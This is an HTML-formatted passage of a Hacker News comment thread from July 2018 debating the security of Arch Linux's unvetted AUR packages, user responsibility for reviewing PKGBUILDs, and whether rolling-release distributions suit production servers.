            <tr class='athing comtr' id='17501768'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501768'href='vote?id=17501768&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=tomn" class="hnuser">tomn</a> <span class="age" title="2018-07-10T20:22:09"><a href="item?id=17501768">on July 10, 2018</a></span> <span id="unv_17501768"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">parent</a> | <a href="#17501628" class="clicky" aria-hidden="true">prev</a> | <a href="#17501459" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501768" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; this is a fundamental problem with the security model of Arch Linux, but that&#x27;s been known for a very long time<p>It&#x27;s exactly the same problem that every other distro has when users compile or install unvetted community packages.<p>The only way to make unvetted community repositories safe is to have users look at the sources before building or installing. Arch encourages users to do that -- AUR helpers and binary repositories are discouraged, and the source package format is simple enough that an average user could probably spot something like this.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17501459'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501459'href='vote?id=17501459&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dozzie" class="hnuser">dozzie</a> <span class="age" title="2018-07-10T19:48:10"><a href="item?id=17501459">on July 10, 2018</a></span> <span id="unv_17501459"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">parent</a> | <a href="#17501768" class="clicky" aria-hidden="true">prev</a> <a class="togg clicky" id="17501459" n="22" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c73">The thing is not that it&#x27;s a new deficiency or something, it&#x27;s just that Arch user conveniently ignore this when praising their distribution over e.g. Debian.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501531'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17501531'href='vote?id=17501531&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=mateuszf" class="hnuser">mateuszf</a> <span class="age" title="2018-07-10T19:58:27"><a href="item?id=17501531">on July 10, 2018</a></span> <span id="unv_17501531"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501459" class="clicky" aria-hidden="true">parent</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501531" n="12" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">AUR repository isn&#x27;t supported by the core tools and packages. To use it one has to install external scripts. So it&#x27;s by no means part of the system.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501918'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17501918'href='vote?id=17501918&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=zanny" class="hnuser">zanny</a> <span class="age" title="2018-07-10T20:37:43"><a href="item?id=17501918">on July 10, 2018</a></span> <span id="unv_17501918"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501531" class="clicky" aria-hidden="true">parent</a> | <a href="#17501643" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501918" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">All it takes to build air packages is makepkg from the core pacman package. With gut you can grab aur packages from the terminal, and hit is also core. Every Arch install must have pacman and hit is in base-devel, a package group in core all AUR pkgbuilds are designed to assume is installed.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17501643'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17501643'href='vote?id=17501643&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=_ooqq" class="hnuser">_ooqq</a> <span class="age" title="2018-07-10T20:10:44"><a href="item?id=17501643">on July 10, 2018</a></span> <span id="unv_17501643"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501531" class="clicky" aria-hidden="true">parent</a> | <a href="#17501918" class="clicky" aria-hidden="true">prev</a> | <a href="#17501779" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501643" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c5a">Urm, you need git, you need build tools... and pacman.<p>That&#x27;s it. But oh yeah, because I do these things by hand and check whether the source urls point to the place I&#x27;d actually like to install (and other code doesn&#x27;t download external sources, eg. in the PKGBUILD or external scripts like *.install files), I&#x27;m suddenly an exception.<p>I just noticed that the blue used on the Archlinux logo is actually quite consistent with Rick&#x27;s hair color. <a href="https:&#x2F;&#x2F;i.imgur.com&#x2F;kkE25w2.jpg" rel="nofollow">https:&#x2F;&#x2F;i.imgur.com&#x2F;kkE25w2.jpg</a> Fits me. I don&#x27;t give a damn.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501858'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17501858'href='vote?id=17501858&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T20:30:09"><a href="item?id=17501858">on July 10, 2018</a></span> <span id="unv_17501858"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501643" class="clicky" aria-hidden="true">parent</a> | <a href="#17501779" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501858" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I&#x27;ll assure you Rick has a blue-grayish color while the Arch logo is Navy Blue.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17501779'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17501779'href='vote?id=17501779&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dozzie" class="hnuser">dozzie</a> <span class="age" title="2018-07-10T20:23:42"><a href="item?id=17501779">on July 10, 2018</a></span> <span id="unv_17501779"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501531" class="clicky" aria-hidden="true">parent</a> | <a href="#17501643" class="clicky" aria-hidden="true">prev</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501779" n="8" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c5a">Which, as I said, very conveniently is glossed over by Arch users.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501956'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17501956'href='vote?id=17501956&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=JackCh" class="hnuser">JackCh</a> <span class="age" title="2018-07-10T20:41:44"><a href="item?id=17501956">on July 10, 2018</a></span> <span id="unv_17501956"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501779" class="clicky" aria-hidden="true">parent</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501956" n="7" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">That&#x27;s a problem with Arch users, not with Arch.   It&#x27;s unfortunately common that fanboys undermine the reputation of reasonable software.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502022'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17502022'href='vote?id=17502022&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dozzie" class="hnuser">dozzie</a> <span class="age" title="2018-07-10T20:48:49"><a href="item?id=17502022">on July 10, 2018</a></span> <span id="unv_17502022"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501956" class="clicky" aria-hidden="true">parent</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502022" n="6" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c5a">Oh yes, it is a problem with the users, not the software itself, but you don&#x27;t get to separate the two in the case of an OS or distribution.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502179'><td><table border='0'>  <tr>    <td class='ind' indent='6'><img src="s.gif" height="1" width="240"></td><td valign="top" class="votelinks">
      <center><a id='up_17502179'href='vote?id=17502179&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=JackCh" class="hnuser">JackCh</a> <span class="age" title="2018-07-10T21:08:18"><a href="item?id=17502179">on July 10, 2018</a></span> <span id="unv_17502179"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17502022" class="clicky" aria-hidden="true">parent</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502179" n="5" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; <i>&quot;but you don&#x27;t get to separate the two in the case of an OS or distribution.&quot;</i><p>Actually I <i>do</i> get to do that.  It&#x27;s an important distinction because if the software isn&#x27;t at fault, then a technically competent user can safely use it by merely not being as dumb as the average user.  But if the software itself is at fault, then the technically competent user should stay clear of it.  Idiots will be idiots no matter the distribution.  If it weren&#x27;t arch, they might be downloading third party RPMs or debs from untrusted sources.  Would that be reason for a technically competent person to avoid RHEL or Debian?  Of course not.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502371'><td><table border='0'>  <tr>    <td class='ind' indent='7'><img src="s.gif" height="1" width="280"></td><td valign="top" class="votelinks">
      <center><a id='up_17502371'href='vote?id=17502371&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dozzie" class="hnuser">dozzie</a> <span class="age" title="2018-07-10T21:31:50"><a href="item?id=17502371">on July 10, 2018</a></span> <span id="unv_17502371"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17502179" class="clicky" aria-hidden="true">parent</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502371" n="4" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c5a">&gt; It&#x27;s an important distinction because if the software isn&#x27;t at fault, [...]<p>Though the software is at fault. It created a false sense of security,
misleading the users. What else in Arch just feels secure, but in fact is not?<p>And then, if the users around the software generally exhibit a jockey
attitude, you get the whole environment built in a similar manner, not
a robust one. The software may technically not be at fault and technically
could be used in a safe manner, but you won&#x27;t get much exposure to that, any
such use will be cumbersome and difficult (because nobody uses it this way),
so you still should stay clear of the software. So no, you don&#x27;t get to
separate the users and the OS&#x2F;distribution.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502573'><td><table border='0'>  <tr>    <td class='ind' indent='8'><img src="s.gif" height="1" width="320"></td><td valign="top" class="votelinks">
      <center><a id='up_17502573'href='vote?id=17502573&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=m45t3r" class="hnuser">m45t3r</a> <span class="age" title="2018-07-10T21:59:15"><a href="item?id=17502573">on July 10, 2018</a></span> <span id="unv_17502573"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17502371" class="clicky" aria-hidden="true">parent</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502573" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; Though the software is at fault. It created a false sense of security, misleading the users. What else in Arch just feels secure, but in fact is not?<p>AUR never tried to pass false sense of security, it is explicitly declared as not supported everywhere.<p>&gt; And then, if the users around the software generally exhibit a jockey attitude, you get the whole environment built in a similar manner, not a robust one. The software may technically not be at fault and technically could be used in a safe manner, but you won&#x27;t get much exposure to that, any such use will be cumbersome and difficult (because nobody uses it this way), so you still should stay clear of the software. So no, you don&#x27;t get to separate the users and the OS&#x2F;distribution.<p>Except it is not, experienced users of Arch community vocally recommends new users to not blindly trust AUR, and the dangers of AUR is also documented everywhere. This is also one of the reasons that yaourt is shamed in public Arch communities like &#x2F;r&#x2F;archlinux, since it defaults to poor security behavior.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17507329'><td><table border='0'>  <tr>    <td class='ind' indent='9'><img src="s.gif" height="1" width="360"></td><td valign="top" class="votelinks">
      <center><a id='up_17507329'href='vote?id=17507329&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dozzie" class="hnuser">dozzie</a> <span class="age" title="2018-07-11T14:44:39"><a href="item?id=17507329">on July 11, 2018</a></span> <span id="unv_17507329"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17502573" class="clicky" aria-hidden="true">parent</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17507329" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; AUR never tried to pass false sense of security, it is explicitly declared as not supported everywhere.<p>Funny that I only ever hear of this when talking about security aspects, not
when discussing available software. In the latter case I always hear how many
things are there in AUR, especially comparing to Debian. AUR must have failed
miserably in not trying to pass false sense of security.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17515583'><td><table border='0'>  <tr>    <td class='ind' indent='10'><img src="s.gif" height="1" width="400"></td><td valign="top" class="votelinks">
      <center><a id='up_17515583'href='vote?id=17515583&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=m45t3r" class="hnuser">m45t3r</a> <span class="age" title="2018-07-12T15:33:02"><a href="item?id=17515583">on July 12, 2018</a></span> <span id="unv_17515583"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17507329" class="clicky" aria-hidden="true">parent</a> | <a href="#17501506" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17515583" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; Funny that I only ever hear of this when talking about security aspects, not when discussing available software. In the latter case I always hear how many things are there in AUR, especially comparing to Debian. AUR must have failed miserably in not trying to pass false sense of security.<p>One argument does not invalidate the other. It is true that tons of software are available in AUR that is not easily available in other distros. It is also true that AUR is not supported.<p>A similar thing happens with PPAs in Ubuntu or even with Flatpak&#x2F;Snaps: they brings tons of additional software to the distro, however they&#x27;re unsupported and can be security nightmares [1].<p>[1]:Yeah, even when Flatpak&#x2F;Snaps are properly sandbox (since some apps are not), they can include software to mine cryptocurrencies for example.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                                                            <tr class='athing comtr' id='17501506'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17501506'href='vote?id=17501506&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dvfjsdhgfv" class="hnuser">dvfjsdhgfv</a> <span class="age" title="2018-07-10T19:55:24"><a href="item?id=17501506">on July 10, 2018</a></span> <span id="unv_17501506"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501459" class="clicky" aria-hidden="true">parent</a> | <a href="#17501531" class="clicky" aria-hidden="true">prev</a> <a class="togg clicky" id="17501506" n="9" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Fortunately admins are not unreasonable and don&#x27;t base their decisions on praises but on actual merits, so most servers run Debian rather than Arch (which is an interesting distro for other usage cases).</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501567'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17501567'href='vote?id=17501567&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=farresito" class="hnuser">farresito</a> <span class="age" title="2018-07-10T20:02:19"><a href="item?id=17501567">on July 10, 2018</a></span> <span id="unv_17501567"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501506" class="clicky" aria-hidden="true">parent</a> <a class="togg clicky" id="17501567" n="8" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Who would want to use a rolling release distribution for a (production) server? Sounds like a pretty terrible choice, to be quite honest.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501828'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17501828'href='vote?id=17501828&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=cmiles74" class="hnuser">cmiles74</a> <span class="age" title="2018-07-10T20:27:44"><a href="item?id=17501828">on July 10, 2018</a></span> <span id="unv_17501828"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501567" class="clicky" aria-hidden="true">parent</a> | <a href="#17501878" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501828" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Maybe you could make the case for some cutting edge development or test box, but then again, I&#x27;d rather be testing on something that&#x27;s as close to identical to the production environment as possible.<p>I used Arch on my laptop (primarily used for development) for several years. It mostly worked great and I always had access to the newest whatever with a minimum of hassle. I don&#x27;t have many complaints, but occasionally after an update something critical would stop working.<p>I&#x27;m on Solus now and, so far, it&#x27;s been pretty great. :-)</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17501878'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17501878'href='vote?id=17501878&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T20:33:04"><a href="item?id=17501878">on July 10, 2018</a></span> <span id="unv_17501878"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501567" class="clicky" aria-hidden="true">parent</a> | <a href="#17501828" class="clicky" aria-hidden="true">prev</a> | <a href="#17501941" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501878" n="4" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">All of the Arch Linux infrastructure is run on Arch. Works pretty well.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501927'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17501927'href='vote?id=17501927&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=JackCh" class="hnuser">JackCh</a> <span class="age" title="2018-07-10T20:38:37"><a href="item?id=17501927">on July 10, 2018</a></span> <span id="unv_17501927"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501878" class="clicky" aria-hidden="true">parent</a> | <a href="#17501941" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501927" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">There is an expectation that projects dogfood their own software, but I really can&#x27;t think of a rational reason for a production server not affiliated with the Arch project to be running Arch.<p>Rolling release is great for technically competent users to install on their workstations, but why would you ever want a rolling release on a production server?</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502023'><td><table border='0'>  <tr>    <td class='ind' indent='6'><img src="s.gif" height="1" width="240"></td><td valign="top" class="votelinks">
      <center><a id='up_17502023'href='vote?id=17502023&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T20:48:54"><a href="item?id=17502023">on July 10, 2018</a></span> <span id="unv_17502023"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501927" class="clicky" aria-hidden="true">parent</a> | <a href="#17507483" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502023" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">You wouldn&#x27;t. The only reason why we run it is because we know it. I wouldn&#x27;t have used Arch on any production things personally.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17507483'><td><table border='0'>  <tr>    <td class='ind' indent='6'><img src="s.gif" height="1" width="240"></td><td valign="top" class="votelinks">
      <center><a id='up_17507483'href='vote?id=17507483&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=semi-extrinsic" class="hnuser">semi-extrinsic</a> <span class="age" title="2018-07-11T15:06:34"><a href="item?id=17507483">on July 11, 2018</a></span> <span id="unv_17507483"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501927" class="clicky" aria-hidden="true">parent</a> | <a href="#17502023" class="clicky" aria-hidden="true">prev</a> | <a href="#17501941" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17507483" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Well, one thing which I know of several projects doing, is having an Arch server as one of the continuous testing servers. This way you can test against bleeding edge gcc&#x2F;glibc&#x2F;whatnot and catch bugs or breaking API changes long before they appear in major distros.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                        <tr class='athing comtr' id='17501941'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17501941'href='vote?id=17501941&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=walrus01" class="hnuser">walrus01</a> <span class="age" title="2018-07-10T20:40:21"><a href="item?id=17501941">on July 10, 2018</a></span> <span id="unv_17501941"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501567" class="clicky" aria-hidden="true">parent</a> | <a href="#17501878" class="clicky" aria-hidden="true">prev</a> <a class="togg clicky" id="17501941" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Nobody that values their job or sleeping well at night. It&#x27;s basically one level of nuts above and beyond running Debian Sid on all your production servers.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502344'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17502344'href='vote?id=17502344&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=hultner" class="hnuser">hultner</a> <span class="age" title="2018-07-10T21:28:01"><a href="item?id=17502344">on July 10, 2018</a></span> <span id="unv_17502344"></span>          <span class='navs'>
             | <a href="#17501438" class="clicky" aria-hidden="true">root</a> | <a href="#17501941" class="clicky" aria-hidden="true">parent</a> <a class="togg clicky" id="17502344" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I ran SID in a embedded customer box testing unreleased software, I did run it in KVM from a stable release since I wouldn’t have physical access if something went wrong, glad I did.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                                          </table>
  <br><br>
</td></tr>
<tr><td><img src="s.gif" height="10" width="0"><table width="100%" cellspacing="0" cellpadding="1"><tr><td bgcolor="#ff6600"></td></tr></table><br><center><a href="https://www.ycombinator.com/apply/">
        Applications are open for YC Winter 2023
      </a></center><br><center><span class="yclinks"><a href="newsguidelines.html">Guidelines</a>
        | <a href="newsfaq.html">FAQ</a>
        | <a href="lists">Lists</a>
        | <a href="https://github.com/HackerNews/API">API</a>
        | <a href="security.html">Security</a>
        | <a href="http://www.ycombinator.com/legal/">Legal</a>
        | <a href="http://www.ycombinator.com/apply/">Apply to YC</a>
        | <a href="mailto:hn@ycombinator.com">Contact</a></span><br><br><form method="get" action="//hn.algolia.com/">Search:
          <input type="text" name="q" value="" size="17" autocorrect="off" spellcheck="false" autocapitalize="off" autocomplete="false"></form>
            </center></td></tr>
      </table></center></body>
